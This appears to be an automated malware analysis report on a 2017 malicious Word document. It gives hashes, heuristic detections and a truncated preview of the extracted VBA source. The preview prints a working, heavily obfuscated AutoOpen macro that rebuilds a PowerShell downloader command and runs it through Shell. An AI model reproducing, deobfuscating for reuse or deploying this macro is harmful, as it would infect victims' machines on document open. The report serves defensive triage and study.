Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 164245625fabdfc0…

MALICIOUS

Office (OLE)

114.0 KB Created: 2017-11-15 07:58:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 2a920dfc7b5ab2eff8ac8df93617a697 SHA-1: 7db3a3225c41ebae4b114ecaf473edf2af003350 SHA-256: 164245625fabdfc0af1296b6deb4cccce5aab179c973d9f5659be9f4b3fce51d
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro uses the Shell() function to execute a payload, likely a downloader. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination URL without dynamic analysis. The presence of Shell() and the obfuscated loader strongly indicate a macro-based malware delivery.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 103571 bytes
SHA-256: 0237e93f6598573d84dd78ae6f8eee99a51035045893fdfcea1c899ffca9a974
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 56 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UASqQEwzT"
Sub AutoOpen()
ucDjnjrBc = "wqNhNazXK" + "cbhKjCvpO" + "HCXKAQNhS" + "PJEjidsfd"
Shell$ HbOjpVVcN, 0
vXUYScSuC = "PkwAozVjw" + "EnpwUjIiN" + "FvzDRBYAS" + "ujkvsFNzw"
End Sub
Function HbOjpVVcN()
YQsfpbcTo = "XAADD3pNC7ZrZPBJQQaOFjauJhQWZpOhGwMBzqqoSlQsPQRqmFQiEdVQbOhMzsJcjNmZDzKaZmwTThitQajUYfdcavZkJirZboMCdrnmuqJShCzujnwWIpDBkKwHaaQuvWrfVcPYnwZhWKvYwfAViUQmkKRTtfMUZOXKKRYHXXjLQViZOaJuauMaFFuKLwfHW40"
THYAKvkm = Mid(YQsfpbcTo, 14, 179)
ijuiwwGiH = Array(37, 73, 58, 15)
fqQfuWET = Array(11, 62, 47, 94)
KfVPpzf = Array(54, 93, 63, 68)
hPbnGwz = "FKtboHdYNrdcssv0PCr04YFjwPdNYknhrmdqNiHQbUobilCtrvWoNzUQCfwqqlQHCtOiQQompzYZLRlMNkVdOzUuRNnhkQapEhYoWTcbGkwOZuFkuldFPmsDZURDcHCZYiVdtwqtIuWiAGUWHDmzmVaRpVPBCYzkDbIV0n063Awk"
JtzQcawd = Mid(hPbnGwz, 25, 135)
NuPaH = Array(83, 87, 36, 16)
kWjliEp = Array(23, 95, 85, 56)
QHzXT = Array(47, 80, 47, 41)
dQnOhK = "jVUzziwsDzMQ5WAaiIzDkEIInlNjGtzKkFWOjsESVRufBwEFXOwbscbLNWldMdohwCpAjfiSrMlSKcGrhIJswWRIdKBJGbGsdNizGDWrkdjjqIBkQuwDUwkakhWYiULQFtpwuGkdlRITnlSVJQtMfCYhdHPZjzMPRTazTEqJJSRCnQnzPBOOazkCUHTmrLwnFsBTKUBEakCNkVtMUPKfiwpSiXcD01X"
KKMnbVH = Mid(dQnOhK, 21, 199)
TAbpptdXiof = Array(19, 30, 77, 71)
OtGSPwiPJMb = Array(24, 11, 34, 99)
PuDJHFFmV = Array(86, 20, 55, 13)
hTiGzQ = "qEXnXvKbvStsQViUdUIFhzQzcWiwurbbOVdw3Ht7mjq7q0"
RGBhzpm = Mid(hTiGzQ, 3, 26)
Micvd = Array(38, 65, 56, 58)
FOriFYf = Array(49, 99, 50, 27)
drJvvjkL = Array(60, 20, 15, 36)
JYCuDUAR = "wZJvBRvGMSWWJoWNMwXMDIhlCjVhoKIoFnOhwiraACJquOOjRvvsWTjl"
UBuFrhFzUQY = Mid(JYCuDUAR, 10, 44)
lLCEGfUsn = Array(49, 34, 27, 43)
rhWNmaLAu = Array(88, 50, 45, 39)
cJdrw = Array(89, 52, 31, 99)
XDArh = "LprZd7MrDj05XSZOjMVul1R1lGCX8lHCjlmspTWRErGYzzBaPfYJzVLFdzilqzEYptfiCCKqRYsfLaQJQBlmjzDOZjPrpkbGnijERTXNViracfuDhUVoMRsrpRIWnSBhwmsdqLswdXRzGdmulLKUPmuVpsOALAaCjKdpnRMVcYKoAulMfOkbIjRKrXnwzrldwOQvzwGUzorqbGUuGCVzPzuAtTUu6j"
nkPoFCzvm = Mid(XDArh, 31, 188)
ipiLXVAOZnw = Array(67, 91, 73, 80)
oVDRQ = Array(24, 51, 46, 82)
zEbqdYw = Array(85, 92, 75, 77)
pZjlQ = "ESQw4P8a1klWojXccuQtirMlDSwVdwvPTpuzKoqzXSzOGRbBRF5EZYEmijww4i9"
BzAVoWHWIa = Mid(pZjlQ, 23, 28)
dsamMAfL = Array(92, 54, 17, 25)
wTTJPBC = Array(55, 40, 84, 12)
fNbYwEZQZ = Array(90, 81, 46, 34)
UMhSBo = "wBEkUv1KWpEJsfBrDamrjzaECRMjWzZIQFdEKwJKLGXQLUbQkGBqSiXUbBCXsIbWaGrlBzhGRbfcaJtipvzPwjphiJdIumSDiAqFdpPnZuZqDutSIUhzJMYqQJDrTYMfJcwaToFzfLpDKzdoQKzZEVtSbzoTmXTAithbvTwUPhRzWUjRfPbJZnanifwTzlNIsoVQRCswMfKWEvwHSCQ0s308FRzmBTI"
wwSskhpm = Mid(UMhSBo, 14, 196)
ijXswPCTr = Array(35, 42, 50, 52)
UzStOfDjlb = Array(80, 62, 71, 29)
HpFbGjUImF = Array(18, 26, 33, 56)
LFlGjvUZB = "bGEUYYziZprYbrwvkzVQOCSAuwZUCmDHEoXhoqjvXwbRdwfLoDCXFBaTwBIcZifnmjTnURHtNZsSaBWvQNfwjfCDNDkmhHVsRoitisrXwJJfIIsvfMMMzjEGjQQZqF6TZwwj"
YjRZjim = Mid(LFlGjvUZB, 7, 116)
baQwF = Array(53, 33, 85, 72)
LHazu = Array(73, 63, 30, 30)
RVVbCV = Array(55, 49, 88, 50)
MKnVu = "MFZ0Oj0ODV4ZQjULGEABmWcRXVIBZVXuFLpHVuItkkYNNSbrczDbIHGYCvorriikIVUEqNqLvGQCzPDFtQZbSwmzFRFaGRCGFoEswWAOHrQ0OoqkmRCEI9DOUw3SiI77LO1"
SPNAXIW = Mid(MKnVu, 12, 95)
DziKHD = Array(83, 29, 19, 87)
SfiFwFLR = Array(59, 59, 73, 32)
AGAwzfj = Array(74, 26, 61, 27)

YQsfpbcTo = "TM1AzppY7EnTieachiv8L+v8L'+'eehi+ehivem'+'ents.cv8L+v8Lom/nOv8L+v8LXv8L+v8LubLyf/KNlv8L+v'+'8L.Split(K'+'Nl,v8L+v'+'8LKNl);v8L+eh2vQ"
THYAKvkm = Mid(YQsfpbcTo, 14, 116)
ijuiwwGiH = Array(37, 73, 58, 15)
fqQfuWET = Array(11, 62, 47, 94)
KfVPpzf = Array(54, 93, 63, 68)
hPbnGwz = "Y9ZM7lr7JZERk0rHXNvKZ4zFLKNlv8L,[CHaR]39)sP1 .( MnvpshOmE[4]+MnvpShoME[30]+v8Lxv8L)ehi)-cREPlaCe  ehiMnvehi,[CHAr]36 -rEplAce ([CHAr]WJO07nkRhl41J"
JtzQcawd = Mid(hPbnGwz, 25, 109)
NuPaH = Array(83, 87, 36, 16)
kWjliEp = Array(23, 95, 85, 56)
QHzXT = Array(47, 80, 47, 41)
dQnOhK = "SI41KGRipFFruI76GhfWm('+'bKv8ehi+ehiL+ehi+ehiv8Lc
... (truncated)